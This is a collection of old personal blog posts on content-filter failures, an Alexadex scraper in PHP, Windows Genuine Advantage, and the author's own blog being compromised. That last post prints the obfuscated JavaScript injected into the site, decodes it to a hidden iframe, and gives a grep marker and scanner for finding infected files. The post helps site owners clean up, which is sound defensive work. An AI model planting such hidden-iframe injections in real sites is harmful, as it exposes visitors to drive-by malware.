Internet Filtering is Dumb

This is not a new story, but the topic of internet content filtering comes up from time to time, so I wanted to post this picture while I remember where it is.

[Photo: Dumb Internet Filtering]

From time to time, somebody suggests that filtering internet content at various points would be a good idea. Invariably, the argument behind it is “Think of the Children. Who is looking out for our children?”

There are all sorts of reasons why the concept is flawed, but one big gaping problem that most people seem to ignore is that filtering software is dumb. Human classifiers would make errors, but manual classification cannot possibly cope with the volume of existing and new content, so filtering software has to try to classify material based on a set of rules. This is always going to fail, both passing content that will offend and blocking inoffensive, important content.
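I have no idea what rules the filter on that terminal actually used, but a minimal sketch of rule-based blocking shows both kinds of failure. The blocklist and the sample page text here are invented for illustration; real products use much larger rule sets.

```javascript
// Hypothetical blocklist, invented for this sketch.
const BLOCKED_TERMS = ["sex", "adult"];

// Naive rule: block the page if any listed term appears anywhere in its text.
function isBlocked(pageText) {
  const text = pageText.toLowerCase();
  return BLOCKED_TERMS.some((term) => text.includes(term));
}

// Harmless pages that trip the rule (false positives).
console.log(isBlocked("Train fares: adult $30, child $15"));
console.log(isBlocked("Bus timetable for Essex and Sussex"));

// A page that dodges the rule with a trivial misspelling (false negative).
console.log(isBlocked("Explicit pics, spelled s3x to dodge filters"));
```

The first two calls report a block and the third does not, which is exactly the wrong way round.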

This is not a very sharp photo, but it is the screen of a public internet terminal. The site I am attempting to view in my own twisted, lascivious way is Amtrak's. Now, instead of the pictures of train timetables without any clothes on that I was expecting to see, I get, “This page has been blocked by the Content Filter because it may contain adult content not suitable for a public environment”.

Who is looking out for our adults? Whether they are (relatively) clean-living tourists trying to buy a train ticket from Portland to Seattle, or anorak-wearing, trainspotting weirdos who get a perverse kick from looking at Amtrak fare information, does not really matter. Adults should be free to look at this and similar transport-related “adult content” without having to apply for permission.

On a related note, because filtering software is so dumb, parents should not allow themselves to be lulled into a false sense of security thinking that a machine is doing their job for them. Do you know where your teenager is now? At this very minute, they could be perusing a hard core bus timetable, or even scouring the net for uncensored videos of 747s taking off.

Fun with Alexadex

In case you are not aware, Alexadex is a virtual stock market game, where the values of stocks depend on their Alexa reach ratings.

Because I have too much time on my hands, I wanted to track my portfolio value in the sidebar of my blog. Look over there somewhere --> and you will probably see it.

In case it holds amusement value to somebody, here is the code. It relies on PHP and MySQL and just does some simple screen scraping.

The fact that this URL works:
hints that there might be an API to do this at some point, but for now, I am screen scraping. (URL pulled from Cal Evans’ blog)

The database table looks like this:

CREATE TABLE alexadex (
  timestamp timestamp(14) NOT NULL,
  value int(11) NOT NULL default '0',
  PRIMARY KEY  (timestamp)
);

From a cron job I am running:



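// Open the database connection before storing anything
connectToDb();

$username = 'tangledweb';
$url = "$username";  // the address of the Alexadex profile page goes before $username
$marker = 'total:</b></td><td align=right>$';

// scrape() returns false if the page or the marker could not be found
$current = scrape($url, $marker);
if ($current !== false) {
   storeCurrent($current);
   echo "stored: ";
}

echo $current;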


In case it is not obvious, my Alexadex username is tangledweb.

In my blog sidebar I have:

echo '<li><a href = ""
      >My current portfolio is $';
$temp = getMostRecentFromDb();
echo number_format($temp['value']).'</a>';

The functions these rely on are:

function storeCurrent($value)
{
  // intval() keeps anything non-numeric out of the query
  $value = intval($value);
  $sql = "INSERT
          INTO alexadex
          VALUES (NOW(), $value)";
  $result = mysql_query($sql);
  return $result;
}

function getMostRecentFromDb()
{
  // Newest row first, and only that row
  $sql = "SELECT *
          FROM alexadex
          WHERE 1
          ORDER BY `timestamp` DESC
          LIMIT 1";

  $result = mysql_query($sql);

  return mysql_fetch_array($result);
}

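function scrape($url, $marker, $maxLength = 50)
{
  $page = file_get_contents($url);
  if ($page === false) {
    return false;
  }
  // Find the text that immediately precedes the number we want
  $pos = strpos($page, $marker);
  if ($pos === false) {
    return false;
  }
  // Take what follows the marker, drop thousands separators, keep the leading digits
  $value = substr($page, $pos + strlen($marker), $maxLength);
  $value = str_replace(',', '', $value);
  $value = intval($value);
  return $value;
}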

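function connectToDb()
{
  // "host", "user", "password" and "dbname" are placeholders for your own settings
  $connection = mysql_connect("host", "user", "password");
  mysql_select_db("dbname", $connection);
}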

This code comes with no warranty of any kind. You can have it as public domain, but I would appreciate a link to this blog if you use it. I hope it still works. WordPress seems to really, really want to mess with it when it saves it.

Microsoft vs. Spyware

OK, I realise that whining about Microsoft is about as passé as whining about taxation, and about as likely to have any effect, but some similarities struck me the other day.

I was cleaning up some spyware or something from some of my websites and I thought it would be a good idea to make sure that all my Windows machines had the Microsoft patch for the WMF vulnerability. Start Windows Update running, click through the defaults, ignore the 792 page EULA and download what Microsoft classifies as “Critical Updates”.

One of the things people hate most about spyware, adware and their associated inbred toolbars and whatnots is that they use deceptive means to fool people into installing them. They either outright lie, or they provide one attractive feature and embed permission to do whatever else in an incomprehensible 792 page EULA.

Some large software companies behave in a remarkably similar way. What I requested from Microsoft, and what it was implied I was getting, was critical security updates. What I got instead was something called “Windows Genuine Advantage”. Now Bill and I clearly have different ideas about what is critical. Something that, as far as I can tell, just allows Microsoft to check whether a computer is running a legal copy of Windows is not critical to me. In fact, it is not even desirable. The only reason I installed it was that the information provided was a mixture of misleading and too long to read in detail.

In the medium and long term, I think it works to everybody’s disadvantage. The last thing the world needs is more unpatched Windows machines connected to the internet. Whether they are unpatched because of owner inaction or because Microsoft decided to stop providing patches to machines with serial numbers it dislikes, the end effect is the same: more zombie machines wasting bandwidth and probing others because they have been infiltrated through well-known vulnerabilities.

Spyware and popups close to home

It seems somebody, somewhere has a fine sense of irony. A few days ago I posted about a sleazy popup advertising vendor. Then on Sunday morning I looked at my blog to find that it had been altered and code had been inserted in numerous places to force downloads of a (presumably corrupt) WMF file from a website with a .ru extension.

My web host was really, really, remarkably useless, so I am a bit short on details. I think the most likely situation is that an automated script running somewhere on the shared web host was spidering from account to account and inserting its payload into files with .php or .html extensions wherever it found one writable by the webserver user.

There are a few obvious morals to this story.

  • There are scripts in the wild that target PHP sites on shared hosts. Be careful with yours.
  • Have as few files as possible writable by the webserver user on a shared host. I am sure you already knew this, but it can be hard because,
  • Writers of web apps, such as forums and blogs, require you to have some files and directories writable, so if you are choosing such software for a shared host, see if you can find ones that require as few writable files as possible, and
  • No matter how low your expectations are for the quality of support you expect from a crappy <$10 per month web host, it is always possible for those expectations to be exceeded.
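As a rough way to audit the second point, here is a minimal sketch that lists everything under a directory with the "other" write bit set. It assumes a Unix-style host where the webserver runs as a different user from the account owner, so world-writable is a reasonable stand-in for "writable by the webserver user". The function name is my own invention.

```javascript
const fs = require("fs");
const path = require("path");

// Recursively collect files and directories that any user on the host can write to.
function findWorldWritable(rootDir) {
  const hits = [];
  for (const entry of fs.readdirSync(rootDir, { withFileTypes: true })) {
    const fullPath = path.join(rootDir, entry.name);
    if (entry.isSymbolicLink()) continue; // do not follow links out of the tree
    const mode = fs.statSync(fullPath).mode;
    if (mode & 0o002) hits.push(fullPath); // "other" write permission bit is set
    if (entry.isDirectory()) hits.push(...findWorldWritable(fullPath));
  }
  return hits;
}
```

Calling `findWorldWritable("/path/to/your/site")` returns an array of paths to review. Anything on the list that your software does not genuinely need to write to is a candidate for tighter permissions.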

If you have rarely-checked stuff sitting on a shared host, it would be worth grepping for some distinctive code from the injected payload (perhaps “error_reporting(0)”) to make sure you are not in the same boat.
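If you would rather script the search than grep by hand, this is a minimal sketch. The function name is made up, and the default marker is just the string suggested above.

```javascript
const fs = require("fs");
const path = require("path");

// Recursively list .php/.htm/.html files under rootDir whose contents include the marker.
function findInfectedFiles(rootDir, marker = "error_reporting(0)") {
  const hits = [];
  for (const entry of fs.readdirSync(rootDir, { withFileTypes: true })) {
    const fullPath = path.join(rootDir, entry.name);
    if (entry.isDirectory()) {
      hits.push(...findInfectedFiles(fullPath, marker));
    } else if (entry.isFile() && /\.(php|html?)$/i.test(entry.name)) {
      if (fs.readFileSync(fullPath, "utf8").includes(marker)) hits.push(fullPath);
    }
  }
  return hits;
}
```

Something like `findInfectedFiles("/path/to/your/site").forEach((f) => console.log(f))` prints the matches. Plenty of legitimate PHP also calls error_reporting(0), so treat the output as a list of files to look at, not proof of infection.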

The whole situation of course serves to make Aussie Hero Dale Begg-Smith all the more lovable in my eyes. For anybody who does not understand why people hate this sort of business practice and the arseclowns that practise it, it is because they make their money at the expense of wasting other people’s time. I spent half of my Sunday cleaning up this mess, and still have a few more domains to fix now (Monday night).

In case anybody is curious, the code generally looked like this:

else {


<script language="javascript" type="text/javascript">
var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@ %kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@ 4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';

which unobfuscated is:
<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe
src="" frameborder=0 vspace=0 hspace=0 width=1 height=1
marginwidth=0 marginheight=0 scrolling=no></iframe></div>
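Comparing the two versions, the obfuscation looks like nothing fancier than adding 3 to every character code ('?' becomes '<', 'g' becomes 'd', and so on). I did not keep the decoding loop from the injected script, so the function below is my own reconstruction of the idea, not the attacker's code. It is run on just the first few characters of the string.

```javascript
// Shift every character code down by `shift` (3 matches the sample above).
function shiftDecode(encoded, shift = 3) {
  return Array.from(encoded, (ch) =>
    String.fromCharCode(ch.charCodeAt(0) - shift)
  ).join("");
}

console.log(shiftDecode('?gly#vw|oh@%ylvlelolw|=#klgghq'));
// → <div style="visibility: hidden
```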

In one file I also found:

<a href = "" class=giepoaytr title="hackmai 2.0">hackmai 2.0</a>

There were also assorted new files with generic-sounding names, like date.php and report.php, and .htaccess files that had been created or added to in order to direct 404s to the new bogus files.

Dark side of the web

This widely carried Associated Press story amused me.

It is mostly a standard “predators roam MySpace” story. I have no idea why The Age chose to illustrate it with a picture of a stewardess or some sort of tidily dressed woman on a plane. There does not seem to be any indication in the story that rogue stewardesses (or “female flight attendants” if you prefer) are a significant internet problem, but it would explain airlines’ insistence on turning off mobile devices I suppose.

Buried among the usual concerns and anecdotes that have probably been repeated about every means of communication ever invented is the gem that:

MySpace profiles have been used to threaten classmates and in at least one case, to mock a school principal.

(my emphasis)

It sounds like it is time we pulled the plug on this whole interweb thingo. Won’t somebody think of the principals? If distributing The Anarchist Cookbook was not bad enough, now somebody is mocking a school principal. The horror.

Tagging vs. Meta Tags

So everybody ignores Meta Tags, right? Search engines know that people put any old junk keywords in them to attract traffic, so search engines completely ignore them.

Tagging on the other hand is flavour of the month. For some reason, blog search engines at least give significant weight to tags, and assume that people are not tag keyword stuffing.

I give it three months.

Tags: *

* Any resemblance between these tags and the post content or the top 5 current searches at Technorati is purely coincidental.

Dale Begg-Smith – 'Spam man' wins gold

Dale Begg-Smith, Canadian-Australian Winter Olympic gold medalist, is getting strange media coverage. It seems that he does not particularly want to talk about the Internet business that funds his Lamborghini and his skiing lessons.

Here is a newspaper article linking him to and who may not have been operating at the more glamorous end of the internet economy.

Here is a more flattering newspaper article.

Here are some related links so you can make up your own mind. One of them blames CPM-Media for the FreeScratchAndWin adware:

Official Description: FreeScratchAndWin is an IE spyware Browser Helper Object dressed up as a web ‘scratchcards’ game. (What exactly is available to be won, and whether anybody has ever won it, remains unclear.)

It also hijacks your home- and search-page settings to point to, and complains if you try to change them back.
Comment: Opens pop-up adverts every few minutes.
The software’s terms of use advises that the software can track users’ web usage.
Downloads and installs arbitrary unsigned code as part of an update feature.

And malware

Official Description: Accepting their “second opinion when you surf” actually gives you a toolbar named “Mysearch”. 2nd-thought will redirect your searches as long as it is installed on your computer.
Comment: Browser hijacker that will reset your home page and often redirect your searches to porn sites. Sometimes it will prevent you from changing your home page. seems to be down.

It does not look like it ever had much content though. is for sale and has a generic for sale page on it now.

It has had content recently.

In 2004 the home page was a removal form for some sort of mass email list:

More recently (but undated from Google cache) it sold popunder advertising.